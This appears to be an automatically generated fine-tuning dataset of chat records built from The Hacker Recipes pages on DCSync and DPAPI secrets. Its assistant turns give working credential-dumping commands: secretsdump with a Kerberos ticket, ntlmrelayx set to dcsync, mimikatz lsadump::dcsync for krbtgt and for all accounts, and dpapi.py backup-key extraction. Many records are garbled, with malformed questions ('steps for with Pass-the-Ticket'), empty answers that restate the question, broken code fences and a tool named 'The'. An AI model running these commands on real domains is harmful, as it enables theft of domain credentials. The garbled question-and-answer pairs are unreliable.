{"corpus_index": 277, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/dcsync.md", "page_title": "DCSync", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for with Pass-the-Ticket?"}, {"role": "assistant", "content": "KRB5CCNAME=ticket.ccache secretsdump -k -no-pass -outputfile 'dcsync' -dc-ip \"$DC_IP\" @\"$DC_HOST\"\n``\n\nThe secretsdump script creates the following files.\n\n| File | Content |\n| ---------- | --------------------------------------------------- |\n| .ntds | LM and NT password hashes |\n| .cleartext | Passwords stored using reversible encryption |\n| .kerberos | Kerberos keys (DES, AES128 and AES256) |\n| .sam | Domain controller's SAM secrets |\n| .secrets | Domain controller's LSA secrets |\n\nThis attack can also be operated with a relayed NTLM authentication, but only if the target domain controller is vulnerable to Zerologon since the DRSUAPI always requires signing.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for with Pass-the-Ticket?", "response": "KRB5CCNAME=ticket.ccache secretsdump -k -no-pass -outputfile 'dcsync' -dc-ip \"$DC_IP\" @\"$DC_HOST\"\n``\n\nThe secretsdump script creates the following files.\n\n| File | Content |\n| ---------- | --------------------------------------------------- |\n| .ntds | LM and NT password hashes |\n| .cleartext | Passwords stored using reversible encryption |\n| .kerberos | Kerberos keys (DES, AES128 and AES256) |\n| .sam | Domain controller's SAM secrets |\n| .secrets | Domain controller's LSA secrets |\n\nThis attack can also be operated with a relayed NTLM authentication, but only if the target domain controller is vulnerable to Zerologon since the DRSUAPI always requires signing.\n\n``bash", "metadata": {"corpus_index": 277, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/dcsync.md", "page_title": "DCSync", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the The command for with pass-the-ticket"}, {"role": "assistant", "content": "The secretsdump script creates the following files.\n\n| File | Content |\n| ---------- | --------------------------------------------------- |\n| .ntds | LM and NT password hashes |\n| .cleartext | Passwords stored using reversible encryption |\n| .kerberos | Kerberos keys (DES, AES128 and AES256) |\n| .sam | Domain controller's [SAM secrets](sam-and-lsa-secrets.md) |\n| .secrets | Domain controller's [LSA secrets](sam-and-lsa-secrets.md) |\n\nThis attack can also be operated with a [relayed NTLM authentication](../../ntlm/relay.md), but only if the target domain controller is vulnerable to [Zerologon](../../netlogon/zerologon.md) since the DRSUAPI always requires signing."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the The command for with pass-the-ticket", "response": "The secretsdump script creates the following files.\n\n| File | Content |\n| ---------- | --------------------------------------------------- |\n| .ntds | LM and NT password hashes |\n| .cleartext | Passwords stored using reversible encryption |\n| .kerberos | Kerberos keys (DES, AES128 and AES256) |\n| .sam | Domain controller's [SAM secrets](sam-and-lsa-secrets.md) |\n| .secrets | Domain controller's [LSA secrets](sam-and-lsa-secrets.md) |\n\nThis attack can also be operated with a [relayed NTLM authentication](../../ntlm/relay.md), but only if the target domain controller is vulnerable to [Zerologon](../../netlogon/zerologon.md) since the DRSUAPI always requires signing.", "metadata": {"corpus_index": 278, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/dcsync.md", "page_title": "DCSync", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "The"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on with Pass-the-Ticket"}, {"role": "assistant", "content": "The secretsdump script creates the following files.\n\n| File | Content |\n| ---------- | --------------------------------------------------- |\n| .ntds | LM and NT password hashes |\n| .cleartext | Passwords stored using reversible encryption |\n| .kerberos | Kerberos keys (DES, AES128 and AES256) |\n| .sam | Domain controller's [SAM secrets](sam-and-lsa-secrets.md) |\n| .secrets | Domain controller's [LSA secrets](sam-and-lsa-secrets.md) |\n\nThis attack can also be operated with a [relayed NTLM authentication](../../ntlm/relay.md), but only if the target domain controller is vulnerable to [Zerologon](../../netlogon/zerologon.md) since the DRSUAPI always requires signing."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on with Pass-the-Ticket", "response": "The secretsdump script creates the following files.\n\n| File | Content |\n| ---------- | --------------------------------------------------- |\n| .ntds | LM and NT password hashes |\n| .cleartext | Passwords stored using reversible encryption |\n| .kerberos | Kerberos keys (DES, AES128 and AES256) |\n| .sam | Domain controller's [SAM secrets](sam-and-lsa-secrets.md) |\n| .secrets | Domain controller's [LSA secrets](sam-and-lsa-secrets.md) |\n\nThis attack can also be operated with a [relayed NTLM authentication](../../ntlm/relay.md), but only if the target domain controller is vulnerable to [Zerologon](../../netlogon/zerologon.md) since the DRSUAPI always requires signing.", "metadata": {"corpus_index": 278, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/dcsync.md", "page_title": "DCSync", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `The secretsdump script creates the following files.`?"}, {"role": "assistant", "content": "This command is used for with pass-the-ticket. with Pass-the-Ticket"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `The secretsdump script creates the following files.`?", "response": "This command is used for with pass-the-ticket. with Pass-the-Ticket", "metadata": {"corpus_index": 278, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/dcsync.md", "page_title": "DCSync", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe target vulnerable to Zerologon, dump Domain's secrets in the context of penetration testing"}, {"role": "assistant", "content": "ntlmrelayx.py -t dcsync://'DOMAINCONTROLLER' -auth-smb 'DOMAIN'/'LOW_PRIV_USER':'PASSWORD'\n``\n\n=== Windows\n\nOn Windows, mimikatz (C) can be used lsadump::dcsync to operate a DCSync and recover the krbtgt keys for a golden ticket attack for example. For this attack to work, the following mimikatz command should run in an elevated context (i.e. through runas with plaintext password, pass-the-hash or pass-the-ticket).\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe target vulnerable to Zerologon, dump Domain's secrets in the context of penetration testing", "response": "ntlmrelayx.py -t dcsync://'DOMAINCONTROLLER' -auth-smb 'DOMAIN'/'LOW_PRIV_USER':'PASSWORD'\n``\n\n=== Windows\n\nOn Windows, mimikatz (C) can be used lsadump::dcsync to operate a DCSync and recover the krbtgt keys for a golden ticket attack for example. For this attack to work, the following mimikatz command should run in an elevated context (i.e. through runas with plaintext password, pass-the-hash or pass-the-ticket).\n\n``bash", "metadata": {"corpus_index": 279, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/dcsync.md", "page_title": "DCSync", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for target vulnerable to Zerologon, dump Domain's secrets?"}, {"role": "assistant", "content": "ntlmrelayx.py -t dcsync://'DOMAINCONTROLLER' -auth-smb 'DOMAIN'/'LOW_PRIV_USER':'PASSWORD'\n``\n\n=== Windows\n\nOn Windows, mimikatz (C) can be used lsadump::dcsync to operate a DCSync and recover the krbtgt keys for a golden ticket attack for example. For this attack to work, the following mimikatz command should run in an elevated context (i.e. through runas with plaintext password, pass-the-hash or pass-the-ticket).\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for target vulnerable to Zerologon, dump Domain's secrets?", "response": "ntlmrelayx.py -t dcsync://'DOMAINCONTROLLER' -auth-smb 'DOMAIN'/'LOW_PRIV_USER':'PASSWORD'\n``\n\n=== Windows\n\nOn Windows, mimikatz (C) can be used lsadump::dcsync to operate a DCSync and recover the krbtgt keys for a golden ticket attack for example. For this attack to work, the following mimikatz command should run in an elevated context (i.e. through runas with plaintext password, pass-the-hash or pass-the-ticket).\n\n``bash", "metadata": {"corpus_index": 279, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/dcsync.md", "page_title": "DCSync", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute target vulnerable to Zerologon, dump Domain's secrets?"}, {"role": "assistant", "content": "=== Windows\n\nOn Windows, [mimikatz](https://github.com/gentilkiwi/mimikatz) (C) can be used [`lsadump::dcsync`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/dcsync) to operate a DCSync and recover the `krbtgt` keys for a [golden ticket attack](../../kerberos/forged-tickets/golden) for example. For this attack to work, the following mimikatz command should run in an elevated context (i.e. through runas with plaintext password, [pass-the-hash](../../ntlm/pth.md) or [pass-the-ticket](../../kerberos/ptt.md))."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute target vulnerable to Zerologon, dump Domain's secrets?", "response": "=== Windows\n\nOn Windows, [mimikatz](https://github.com/gentilkiwi/mimikatz) (C) can be used [`lsadump::dcsync`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/dcsync) to operate a DCSync and recover the `krbtgt` keys for a [golden ticket attack](../../kerberos/forged-tickets/golden) for example. For this attack to work, the following mimikatz command should run in an elevated context (i.e. through runas with plaintext password, [pass-the-hash](../../ntlm/pth.md) or [pass-the-ticket](../../kerberos/ptt.md)).", "metadata": {"corpus_index": 280, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/dcsync.md", "page_title": "DCSync", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for target vulnerable to zerologon, dump domain's secrets. target vulnerable to Zerologon, dump Domain's secrets"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for target vulnerable to zerologon, dump domain's secrets. target vulnerable to Zerologon, dump Domain's secrets", "metadata": {"corpus_index": 280, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/dcsync.md", "page_title": "DCSync", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Extract a specific user, in this case the krbtgt?"}, {"role": "assistant", "content": "lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Extract a specific user, in this case the krbtgt?", "response": "lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt", "metadata": {"corpus_index": 281, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/dcsync.md", "page_title": "DCSync", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Extract a specific user, in this case the krbtgt"}, {"role": "assistant", "content": "lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Extract a specific user, in this case the krbtgt", "response": "lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt", "metadata": {"corpus_index": 281, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/dcsync.md", "page_title": "DCSync", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Dump everything (printed in a short and readable format)"}, {"role": "assistant", "content": "lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /all /csv\n``\n\n:::\n\n> [!TIP]\n> For an undocumented reason, Impacket's secretsdump relies on SMB before doing a DCSync (hence requiring a CIFS/domaincontroller SPN when using Kerberos tickets) while Mimikatz relies on LDAP before doing the DCSync (hence requiring a LDAP/domaincontroller` SPN when using Kerberos tickets)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Dump everything (printed in a short and readable format)", "response": "lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /all /csv\n``\n\n:::\n\n> [!TIP]\n> For an undocumented reason, Impacket's secretsdump relies on SMB before doing a DCSync (hence requiring a CIFS/domaincontroller SPN when using Kerberos tickets) while Mimikatz relies on LDAP before doing the DCSync (hence requiring a LDAP/domaincontroller` SPN when using Kerberos tickets)", "metadata": {"corpus_index": 282, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/dcsync.md", "page_title": "DCSync", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Dump everything (printed in a short and readable format)"}, {"role": "assistant", "content": "lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /all /csv\n``\n\n:::\n\n> [!TIP]\n> For an undocumented reason, Impacket's secretsdump relies on SMB before doing a DCSync (hence requiring a CIFS/domaincontroller SPN when using Kerberos tickets) while Mimikatz relies on LDAP before doing the DCSync (hence requiring a LDAP/domaincontroller` SPN when using Kerberos tickets)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Dump everything (printed in a short and readable format)", "response": "lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /all /csv\n``\n\n:::\n\n> [!TIP]\n> For an undocumented reason, Impacket's secretsdump relies on SMB before doing a DCSync (hence requiring a CIFS/domaincontroller SPN when using Kerberos tickets) while Mimikatz relies on LDAP before doing the DCSync (hence requiring a LDAP/domaincontroller` SPN when using Kerberos tickets)", "metadata": {"corpus_index": 282, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/dcsync.md", "page_title": "DCSync", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about DPAPI secrets - Theory?"}, {"role": "assistant", "content": "The DPAPI (Data Protection API) is an internal component in the Windows system. It allows various applications to store sensitive data (e.g. passwords). The data are stored in the users directory and are secured by user-specific master keys derived from the users password. They are usually located at:\n\n``batch\nC:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Protect\\$SUID\\$GUID\n`\n\nApplication like Google Chrome, Outlook, Internet Explorer, Skype use the DPAPI. Windows also uses that API for sensitive information like Wi-Fi passwords, certificates, RDP connection passwords, and many more.\n\nBelow are common paths of hidden files that usually contain DPAPI-protected data.\n\n`batch\nC:\\Users\\$USER\\AppData\\Local\\Microsoft\\Credentials\\\nC:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Credentials\\\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about DPAPI secrets - Theory?", "response": "The DPAPI (Data Protection API) is an internal component in the Windows system. It allows various applications to store sensitive data (e.g. passwords). The data are stored in the users directory and are secured by user-specific master keys derived from the users password. They are usually located at:\n\n``batch\nC:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Protect\\$SUID\\$GUID\n`\n\nApplication like Google Chrome, Outlook, Internet Explorer, Skype use the DPAPI. Windows also uses that API for sensitive information like Wi-Fi passwords, certificates, RDP connection passwords, and many more.\n\nBelow are common paths of hidden files that usually contain DPAPI-protected data.\n\n`batch\nC:\\Users\\$USER\\AppData\\Local\\Microsoft\\Credentials\\\nC:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Credentials\\\n``", "metadata": {"corpus_index": 283, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out DPAPI secrets - Theory during a pentest?"}, {"role": "assistant", "content": "The DPAPI (Data Protection API) is an internal component in the Windows system. It allows various applications to store sensitive data (e.g. passwords). The data are stored in the users directory and are secured by user-specific master keys derived from the users password. They are usually located at:\n\n``batch\nC:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Protect\\$SUID\\$GUID\n`\n\nApplication like Google Chrome, Outlook, Internet Explorer, Skype use the DPAPI. Windows also uses that API for sensitive information like Wi-Fi passwords, certificates, RDP connection passwords, and many more.\n\nBelow are common paths of hidden files that usually contain DPAPI-protected data.\n\n`batch\nC:\\Users\\$USER\\AppData\\Local\\Microsoft\\Credentials\\\nC:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Credentials\\\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out DPAPI secrets - Theory during a pentest?", "response": "The DPAPI (Data Protection API) is an internal component in the Windows system. It allows various applications to store sensitive data (e.g. passwords). The data are stored in the users directory and are secured by user-specific master keys derived from the users password. They are usually located at:\n\n``batch\nC:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Protect\\$SUID\\$GUID\n`\n\nApplication like Google Chrome, Outlook, Internet Explorer, Skype use the DPAPI. Windows also uses that API for sensitive information like Wi-Fi passwords, certificates, RDP connection passwords, and many more.\n\nBelow are common paths of hidden files that usually contain DPAPI-protected data.\n\n`batch\nC:\\Users\\$USER\\AppData\\Local\\Microsoft\\Credentials\\\nC:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Credentials\\\n``", "metadata": {"corpus_index": 283, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on DPAPI secrets - Theory"}, {"role": "assistant", "content": "C:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Protect\\$SUID\\$GUID"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on DPAPI secrets - Theory", "response": "C:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Protect\\$SUID\\$GUID", "metadata": {"corpus_index": 284, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `C:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Protect\\$SUID\\$GUID`?"}, {"role": "assistant", "content": "This command is used for dpapi secrets - theory. Theory"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `C:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Protect\\$SUID\\$GUID`?", "response": "This command is used for dpapi secrets - theory. Theory", "metadata": {"corpus_index": 284, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform DPAPI secrets - Theory?"}, {"role": "assistant", "content": "C:\\Users\\$USER\\AppData\\Local\\Microsoft\\Credentials\\\nC:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Credentials\\"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform DPAPI secrets - Theory?", "response": "C:\\Users\\$USER\\AppData\\Local\\Microsoft\\Credentials\\\nC:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Credentials\\", "metadata": {"corpus_index": 285, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `C:\\Users\\$USER\\AppData\\Local\\Microsoft\\Credentials\\`?"}, {"role": "assistant", "content": "This command is used for dpapi secrets - theory. Theory"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `C:\\Users\\$USER\\AppData\\Local\\Microsoft\\Credentials\\`?", "response": "This command is used for dpapi secrets - theory. Theory", "metadata": {"corpus_index": 285, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain DPAPI secrets - Practice"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, DPAPI-data can be manipulated (mainly offline) with tools like dpapick (Python), dpapilab (Python), Impacket's dpapi.py and secretsdump.py (Python).\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain DPAPI secrets - Practice", "response": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, DPAPI-data can be manipulated (mainly offline) with tools like dpapick (Python), dpapilab (Python), Impacket's dpapi.py and secretsdump.py (Python).\n\n```bash", "metadata": {"corpus_index": 286, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on DPAPI secrets - Practice"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, DPAPI-data can be manipulated (mainly offline) with tools like dpapick (Python), dpapilab (Python), Impacket's dpapi.py and secretsdump.py (Python).\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on DPAPI secrets - Practice", "response": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, DPAPI-data can be manipulated (mainly offline) with tools like dpapick (Python), dpapilab (Python), Impacket's dpapi.py and secretsdump.py (Python).\n\n```bash", "metadata": {"corpus_index": 286, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about (not tested) Decrypt a master key"}, {"role": "assistant", "content": "dpapi.py masterkey -file \"/path/to/masterkey_file\" -sid $USER_SID -password $MASTERKEY_PASSWORD"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about (not tested) Decrypt a master key", "response": "dpapi.py masterkey -file \"/path/to/masterkey_file\" -sid $USER_SID -password $MASTERKEY_PASSWORD", "metadata": {"corpus_index": 287, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform (not tested) Decrypt a master key?"}, {"role": "assistant", "content": "dpapi.py masterkey -file \"/path/to/masterkey_file\" -sid $USER_SID -password $MASTERKEY_PASSWORD"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform (not tested) Decrypt a master key?", "response": "dpapi.py masterkey -file \"/path/to/masterkey_file\" -sid $USER_SID -password $MASTERKEY_PASSWORD", "metadata": {"corpus_index": 287, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of (not tested) Obtain the backup keys & use it to decrypt a master key"}, {"role": "assistant", "content": "dpapi.py backupkeys -t $DOMAIN/$USER:$PASSWORD@$TARGET\ndpapi.py masterkey -file \"/path/to/masterkey_file\" -pvk \"/path/to/backup_key.pvk\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of (not tested) Obtain the backup keys & use it to decrypt a master key", "response": "dpapi.py backupkeys -t $DOMAIN/$USER:$PASSWORD@$TARGET\ndpapi.py masterkey -file \"/path/to/masterkey_file\" -pvk \"/path/to/backup_key.pvk\"", "metadata": {"corpus_index": 288, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on (not tested) Obtain the backup keys & use it to decrypt a master 